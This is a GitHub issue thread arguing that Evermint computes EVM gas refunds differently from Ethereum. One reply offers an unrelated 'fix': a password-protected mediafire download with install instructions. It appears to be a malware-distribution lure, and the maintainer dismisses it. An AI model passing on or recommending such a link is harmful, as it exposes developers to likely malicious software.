### ISSUE TITLE
Problem: possible wrong refund EVM tx implementation

### ISSUE THREAD

**Issue by VictorTrustyDev** [EscanBE/evermint#123]
What Ethereum does:
```text
After state transition, gas refund amount is get from state transition, then
- Refund fee to sender based on the refund amount
- ...
```

What Evermint/Ethermint/Evmos-fork does:
```
After state transition, gas refund amount is get from state transition, then
- Minus from gas used
- Refund fee to sender based on refund = `tx gas - gas consumed`
```

Ethereum actually refunds a little gas while Evermint refunds a lot of gas, that make it have to have additional logic like `MinGasMultiplier` in `x/feemarket` params.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by VictorTrustyDev** [comment]
This is wrong
